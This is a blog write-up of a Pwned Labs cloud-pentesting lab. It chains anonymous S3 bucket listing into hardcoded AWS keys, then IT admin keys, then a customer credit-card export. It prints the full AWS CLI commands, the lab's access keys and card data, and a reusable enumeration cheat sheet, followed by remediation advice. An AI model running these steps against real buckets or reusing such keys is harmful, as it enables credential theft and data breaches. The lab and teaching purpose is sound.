Part 2 of my AWS pentesting series. In Part 1, I covered IAM enumeration from scratch. This post focuses on S3 — what it is, why it's a goldmine for attackers, and how a single public bucket misconfiguration can cascade into full credential compromise. All lab work done on Pwned Labs.
Why S3 Buckets Are a Pentester's Favourite Target
S3 (Simple Storage Service) is AWS's object storage — think of it as an FTP server in the cloud. Organizations use it for everything: static websites, backups, logs, file transfers, and migration scripts. That last one is where things get interesting.
Because S3 is so easy to use, it's also easy to misconfigure. The three misconfigurations that show up most often in real engagements are:
- Public read access — anyone on the internet can list and download files
- Overly permissive bucket policies —
s3:*on*withPrincipal: "*"grants the world full access - Sensitive files left in buckets — credentials, migration scripts, exports, database dumps
In this lab, we start with nothing but a domain name and end up with IT Admin credentials and a full database of customer credit card numbers. Here's every step.
Understanding S3 Access Control
Before diving into the lab, it's worth knowing how S3 access is controlled — because understanding the model is what lets you spot misconfigurations.
S3 has three access control layers:
- Bucket Policies — resource-based JSON policies attached directly to a bucket
- IAM Policies — identity-based policies controlling what a user/role can do with S3
- Access Control Lists (ACLs) — legacy method, largely replaced by the above two
Here's what a dangerously misconfigured bucket policy looks like:
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": "*",
"Action": "s3:*",
"Resource": [
"arn:aws:s3:::public-bucket",
"arn:aws:s3:::public-bucket/*"
]
}
]
}Principal: "*" means anyone — authenticated or not. Action: "s3:*" means list, read, write, delete — everything. This is the worst-case scenario and it exists in production environments more than you'd expect.
The Target: dev.huge-logistics.com
The lab gives us one starting point: http://dev.huge-logistics.com
Phase 1: Passive Recon — Finding the S3 Bucket
Step 1 — Probe the Domain
Sending a POST request to the domain returns:
405 Method Not Allowed
Code: MethodNotAllowed
Message: The specified method is not allowed against this resource.
Method: POST
ResourceType: OBJECT
RequestId: JR75KCAPC32EWZ99The response structure — especially ResourceType: OBJECT — is a dead giveaway. This is an S3-hosted site responding with AWS-style error formatting.
Step 2 — Check the Page Source
Viewing the source code confirms it:
<link rel="stylesheet" href="https://s3.amazonaws.com/dev.huge-logistics.com/static/style.css">The stylesheet is being served directly from s3.amazonaws.com/dev.huge-logistics.com. The bucket name is the domain itself: dev.huge-logistics.com.
Takeaway: Always check page source when a target is web-facing. S3-hosted static sites frequently expose their bucket name in asset URLs.
Phase 2: Unauthenticated Enumeration
Step 3 — List the Bucket Without Credentials
The --no-sign-request flag tells the AWS CLI to make the request without any credentials — simulating what any anonymous user on the internet can see:
aws s3 ls s3://dev.huge-logistics.com --no-sign-request
PRE admin/
PRE migration-files/
PRE shared/
PRE static/
2023-10-16 22:30:47 5347 index.htmlThe bucket is publicly listable. Four directories are visible: admin, migration-files, shared, and static.
Step 4 — Enumerate Each Directory
aws s3 ls s3://dev.huge-logistics.com/admin/ --no-sign-request
# ERROR: AccessDenied
aws s3 ls s3://dev.huge-logistics.com/migration-files/ --no-sign-request
# ERROR: AccessDenied
aws s3 ls s3://dev.huge-logistics.com/shared/ --no-sign-request
# → hl_migration_project.zip
aws s3 ls s3://dev.huge-logistics.com/static/ --no-sign-request
# → logo.png, script.js, style.cssadmin/ and migration-files/ are locked down. But shared/ is accessible — and it contains a ZIP file: hl_migration_project.zip.
Step 5 — Download and Extract the ZIP
aws s3 cp s3://dev.huge-logistics.com/shared/hl_migration_project.zip . --no-sign-request
unzip hl_migration_project.zipExtracted files:
migrate_secrets.ps1
Opening migrate_secrets.ps1 reveals hardcoded AWS credentials at the top of the script:
$accessKey = "AKIA3SFMDAPO7WLZVRVE"
$secretKey = "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"
$region = "us-east-1"This is a PowerShell script intended to migrate secrets into AWS Secrets Manager. Instead of using IAM roles or environment variables, the developer hardcoded credentials directly into the script — then left the script in a publicly accessible S3 bucket.
First credential set acquired — no authentication required.
Phase 3: Authenticated Enumeration
Step 6 — Configure the Compromised Credentials
aws configure --profile pwnlab
AWS Access Key ID: AKIA3SFMDAPO7WLZVRVE
AWS Secret Access Key: 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
Default region name: us-east-1
Default output format: jsonConfirm identity:
aws sts get-caller-identity --profile pwnlab
{
"UserId": "AIDA3SFMDAPOYPM3X2TB7",
"Account": "794929857501",
"Arn": "arn:aws:iam::794929857501:user/pam-test"
}We're now operating as pam-test inside account 794929857501.
Step 7 — Re-Enumerate With Credentials
aws s3 ls s3://dev.huge-logistics.com/admin/ --profile pwnlab
2024-12-02 20:27:44 32 flag.txt
2023-10-17 01:54:07 2425 website_transactions_export.csv
aws s3 ls s3://dev.huge-logistics.com/migration-files/ --profile pwnlab
AWS Secrets Manager Migration - Discovery & Design.pdf
AWS Secrets Manager Migration - Implementation.pdf
migrate_secrets.ps1
test-export.xmlWith pam-test credentials, both previously locked directories are now listable. The admin/ directory has a flag.txt and a CSV export. The migration-files/ directory has PDFs, another migration script, and an XML export.
Step 8 — Download From migration-files
Attempting to download from admin/ returns 403 Forbidden — pam-test can list but not read those objects. Move to migration-files/:
aws s3 cp s3://dev.huge-logistics.com/migration-files/migrate_secrets.ps1 . --profile pwnlab
aws s3 cp s3://dev.huge-logistics.com/migration-files/test-export.xml . --profile pwnlabFrom migrate_secrets.ps1 — second set of hardcoded credentials:
$accessKey = "AKIA3SFMDAPOWOWKXEHU"
$secretKey = "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"From test-export.xml — IT Admin credentials in plaintext:
<CredentialEntry>
<ServiceType>AWS IT Admin</ServiceType>
<AccountID>794929857501</AccountID>
<AccessKeyID>AKIA3SFMDAPO6DGDLJAG</AccessKeyID>
<SecretAccessKey>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</SecretAccessKey>
<Notes>AWS credentials for production workloads. Do not share these keys outside of the organization.</Notes>
</CredentialEntry>The same XML file also contains credentials for: Oracle Database, HP Server Cluster, Iron Mountain Backup, Office 365 Global Admin, and Jira Admin. An entire organization's credential store — sitting in an S3 bucket.
Phase 4: Escalating to IT Admin
Step 9 — Switch to IT Admin Credentials
aws configure --profile pwnlab
AWS Access Key ID: AKIA3SFMDAPO6DGDLJAG
AWS Secret Access Key: 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
aws sts get-caller-identity --profile pwnlab
{
"UserId": "AIDA3SFMDAPOWKM6ICH4K",
"Account": "794929857501",
"Arn": "arn:aws:iam::794929857501:user/it-admin"
}Now operating as it-admin.
Step 10 — Access the Admin Directory
aws s3 cp s3://dev.huge-logistics.com/admin/flag.txt . --profile pwnlab
# → download: flag.txt ✓
aws s3 cp s3://dev.huge-logistics.com/admin/website_transactions_export.csv . --profile pwnlab
# → download: website_transactions_export.csv ✓The website_transactions_export.csv contains live customer data — full credit card numbers, CVVs, expiry dates, usernames, and plaintext passwords for 29 customers.
network,credit_card_number,cvv,expiry_date,card_holder_name,username,password
Visa,4055497191304,386,5/2021,Hunter Miller,hunter_m,password123
Visa,4055491339081,492,8/2021,Jayden Adams,jay_adams,jayden2023
...This is a full data breach scenario — triggered by one publicly accessible S3 bucket.
The Attack Chain — End to End
Public domain (dev.huge-logistics.com)
↓
Page source reveals S3 bucket name
↓
Bucket is publicly listable (no credentials needed)
↓
shared/ directory accessible anonymously
↓
migrate_secrets.ps1 downloaded → hardcoded AWS credentials (pam-test)
↓
pam-test can list admin/ and migration-files/
↓
test-export.xml downloaded → IT Admin AWS credentials + org-wide credential dump
↓
it-admin has full read access to admin/
↓
website_transactions_export.csv downloaded → 29 customer records, credit card data, plaintext passwordsFive steps from a domain name to a full data breach.
Findings Summary
Finding Severity Detail S3 bucket publicly listable High No authentication required to list bucket contents Hardcoded credentials in migrate_secrets.ps1 (shared/) Critical AWS access keys exposed to anonymous users Second hardcoded credentials in migrate_secrets.ps1 (migration-files/) Critical Additional AWS keys stored in plaintext in script test-export.xml contains org-wide credential dump Critical AWS IT Admin keys + Oracle DB, O365 Global Admin, Jira Admin, HP Cluster credentials website_transactions_export.csv exposed Critical 29 customer records with full credit card numbers, CVVs, and plaintext passwords
S3 Enumeration — Quick Reference
# Identify bucket from page source or domain
# List bucket anonymously
aws s3 ls s3://[bucket-name] --no-sign-request
# List subdirectory
aws s3 ls s3://[bucket-name]/[folder]/ --no-sign-request
# Download a file
aws s3 cp s3://[bucket-name]/[path/to/file] . --no-sign-request
# With credentials
aws configure --profile [profile-name]
aws s3 ls s3://[bucket-name]/ --profile [profile-name]
aws s3 cp s3://[bucket-name]/[path/to/file] . --profile [profile-name]
# Confirm identity after credential compromise
aws sts get-caller-identity --profile [profile-name]Remediation — What Should Have Been Done
- Enable Block Public Access on all S3 buckets — AWS provides a single account-level toggle
- Never hardcode credentials in scripts — use IAM roles, environment variables, or AWS Secrets Manager
- Apply least privilege bucket policies — no
Principal: "*", nos3:*wildcards - Audit bucket contents regularly — migration artifacts, exports, and backup files are routinely left behind
- Enable S3 server access logging — detect enumeration attempts before they escalate
- Enable AWS CloudTrail — full API activity logging across the account
Tools Used
Documenting my AWS pentesting journey as I go. Feedback welcome in the comments.
Tags: aws s3 penetration-testing cloud-security cybersecurity ethical-hacking infosec